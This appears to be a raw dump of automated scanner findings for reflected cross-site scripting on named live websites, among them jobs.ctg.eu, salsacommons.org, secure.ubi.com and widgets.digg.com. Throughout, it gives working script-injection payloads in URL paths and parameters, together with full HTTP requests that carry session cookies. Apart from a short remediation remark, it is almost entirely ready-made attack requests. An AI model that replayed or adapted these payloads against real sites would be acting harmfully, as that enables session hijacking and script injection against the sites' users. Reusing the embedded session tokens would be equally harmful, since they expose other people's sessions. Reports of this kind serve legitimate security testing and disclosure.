Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d066f"><img%20src%3da%20onerror%3dalert(1)>a7f78c0cf8f was submitted in the REST URL parameter 5. This input was echoed as d066f"><img src=a onerror=alert(1)>a7f78c0cf8f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/jsd066f"><img%20src%3da%20onerror%3dalert(1)>a7f78c0cf8f/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5178"><img%20src%3da%20onerror%3dalert(1)>0973140bc22 was submitted in the REST URL parameter 6. This input was echoed as d5178"><img src=a onerror=alert(1)>0973140bc22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/jquery.filestyle.mini.jsd5178"><img%20src%3da%20onerror%3dalert(1)>0973140bc22?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30ba9"><img%20src%3da%20onerror%3dalert(1)>805a34d1d8a was submitted in the REST URL parameter 1. This input was echoed as 30ba9"><img src=a onerror=alert(1)>805a34d1d8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites30ba9"><img%20src%3da%20onerror%3dalert(1)>805a34d1d8a/all/themes/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd50"><img%20src%3da%20onerror%3dalert(1)>4aae54469d0 was submitted in the REST URL parameter 2. This input was echoed as ccd50"><img src=a onerror=alert(1)>4aae54469d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allccd50"><img%20src%3da%20onerror%3dalert(1)>4aae54469d0/themes/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40040"><img%20src%3da%20onerror%3dalert(1)>74cc53efc7d was submitted in the REST URL parameter 3. This input was echoed as 40040"><img src=a onerror=alert(1)>74cc53efc7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes40040"><img%20src%3da%20onerror%3dalert(1)>74cc53efc7d/threesixty/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50274"><img%20src%3da%20onerror%3dalert(1)>beb612c26a5 was submitted in the REST URL parameter 4. This input was echoed as 50274"><img src=a onerror=alert(1)>beb612c26a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty50274"><img%20src%3da%20onerror%3dalert(1)>beb612c26a5/js/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ed8c"><img%20src%3da%20onerror%3dalert(1)>e9fc30c79e2 was submitted in the REST URL parameter 5. This input was echoed as 2ed8c"><img src=a onerror=alert(1)>e9fc30c79e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js2ed8c"><img%20src%3da%20onerror%3dalert(1)>e9fc30c79e2/swfobject.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8edfa"><img%20src%3da%20onerror%3dalert(1)>6de297366e6 was submitted in the REST URL parameter 6. This input was echoed as 8edfa"><img src=a onerror=alert(1)>6de297366e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/swfobject.js8edfa"><img%20src%3da%20onerror%3dalert(1)>6de297366e6?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad216"><img%20src%3da%20onerror%3dalert(1)>a10ddffaa58 was submitted in the REST URL parameter 1. This input was echoed as ad216"><img src=a onerror=alert(1)>a10ddffaa58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesad216"><img%20src%3da%20onerror%3dalert(1)>a10ddffaa58/default/files/blogger/Michael_0.jpg?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18ea"><img%20src%3da%20onerror%3dalert(1)>393e7302d5f was submitted in the REST URL parameter 2. This input was echoed as f18ea"><img src=a onerror=alert(1)>393e7302d5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/defaultf18ea"><img%20src%3da%20onerror%3dalert(1)>393e7302d5f/files/blogger/Michael_0.jpg?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef90"><img%20src%3da%20onerror%3dalert(1)>15718a32de0 was submitted in the REST URL parameter 3. This input was echoed as 9ef90"><img src=a onerror=alert(1)>15718a32de0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files9ef90"><img%20src%3da%20onerror%3dalert(1)>15718a32de0/blogger/Michael_0.jpg?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0192"><img%20src%3da%20onerror%3dalert(1)>5cdb37c2fc7 was submitted in the REST URL parameter 4. This input was echoed as e0192"><img src=a onerror=alert(1)>5cdb37c2fc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files/bloggere0192"><img%20src%3da%20onerror%3dalert(1)>5cdb37c2fc7/Michael_0.jpg?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279d9"><img%20src%3da%20onerror%3dalert(1)>8079457cfc0 was submitted in the REST URL parameter 5. This input was echoed as 279d9"><img src=a onerror=alert(1)>8079457cfc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files/blogger/Michael_0.jpg279d9"><img%20src%3da%20onerror%3dalert(1)>8079457cfc0?1262947422 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1d31"><img%20src%3da%20onerror%3dalert(1)>5fcd56ff315 was submitted in the REST URL parameter 1. This input was echoed as a1d31"><img src=a onerror=alert(1)>5fcd56ff315 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesa1d31"><img%20src%3da%20onerror%3dalert(1)>5fcd56ff315/default/files/blogger/Wendy_0.jpg?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5595f"><img%20src%3da%20onerror%3dalert(1)>ef72e250029 was submitted in the REST URL parameter 2. This input was echoed as 5595f"><img src=a onerror=alert(1)>ef72e250029 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default5595f"><img%20src%3da%20onerror%3dalert(1)>ef72e250029/files/blogger/Wendy_0.jpg?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca239"><img%20src%3da%20onerror%3dalert(1)>355951df0a5 was submitted in the REST URL parameter 3. This input was echoed as ca239"><img src=a onerror=alert(1)>355951df0a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/filesca239"><img%20src%3da%20onerror%3dalert(1)>355951df0a5/blogger/Wendy_0.jpg?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13886"><img%20src%3da%20onerror%3dalert(1)>61979da1bf0 was submitted in the REST URL parameter 4. This input was echoed as 13886"><img src=a onerror=alert(1)>61979da1bf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files/blogger13886"><img%20src%3da%20onerror%3dalert(1)>61979da1bf0/Wendy_0.jpg?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e68b"><img%20src%3da%20onerror%3dalert(1)>5d1d857a6ab was submitted in the REST URL parameter 5. This input was echoed as 2e68b"><img src=a onerror=alert(1)>5d1d857a6ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/default/files/blogger/Wendy_0.jpg2e68b"><img%20src%3da%20onerror%3dalert(1)>5d1d857a6ab?1262947372 HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.1.10.1303489680
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4549d"><img%20src%3da%20onerror%3dalert(1)>a96526d001d was submitted in the REST URL parameter 1. This input was echoed as 4549d"><img src=a onerror=alert(1)>a96526d001d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /we-promise4549d"><img%20src%3da%20onerror%3dalert(1)>a96526d001d HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/jobs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; has_js=1; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e0625<script>alert(1)</script>bfb396fceb was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66456"-alert(1)-"9f81cfc7a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o66456"-alert(1)-"9f81cfc7a30/8001/p/salsa/commons/img/favicon.ico HTTP/1.1 Host: salsacommons.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... "text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f7c4"-alert(1)-"e91fbaea79c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/p3f7c4"-alert(1)-"e91fbaea79c/salsa/commons/img/favicon.ico HTTP/1.1 Host: salsacommons.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... avascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64410"-alert(1)-"1c986b6dd8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/p/salsa/commons/img/favicon.ico64410"-alert(1)-"1c986b6dd8 HTTP/1.1 Host: salsacommons.org Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the NextURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd14d"style%3d"x%3aexpression(alert(1))"74425cf103d was submitted in the NextURL parameter. This input was echoed as fd14d"style="x:expression(alert(1))"74425cf103d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /register/CreateAccount.aspx?genomeId=c970157e-c24d-44f3-aba7-819b852e0e02&NextURL=999895'()973289fd14d"style%3d"x%3aexpression(alert(1))"74425cf103d&lang=en-US HTTP/1.1 Host: secure.ubi.com Connection: keep-alive Referer: https://secure.ubi.com/register/login.aspx?genomeId=C970157E-C24D-44F3-ABA7-819B852E0E02&lang=en-US&NextUrl=999895%27%28%29973289 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=101287877.1303486155.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visitor_id=A8CC6CF1-F210-440C-B57B-E6567568B947; utsver=30053; ubisession=1976650102; __utma=101287877.1723011522.1303486155.1303486155.1303486155.1; __utmc=101287877; __utmb=101287877.2.10.1303486155; ASP.NET_SessionId=hyemfw450y0nxlb4z35rg2eu
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 168d7<script>alert(1)</script>c3e46dbbdc1 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/22/html/dork/xss-reflected-cwe79-secure.ubi.com_443.htm168d7<script>alert(1)</script>c3e46dbbdc1 HTTP/1.1 Host: widgets.digg.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
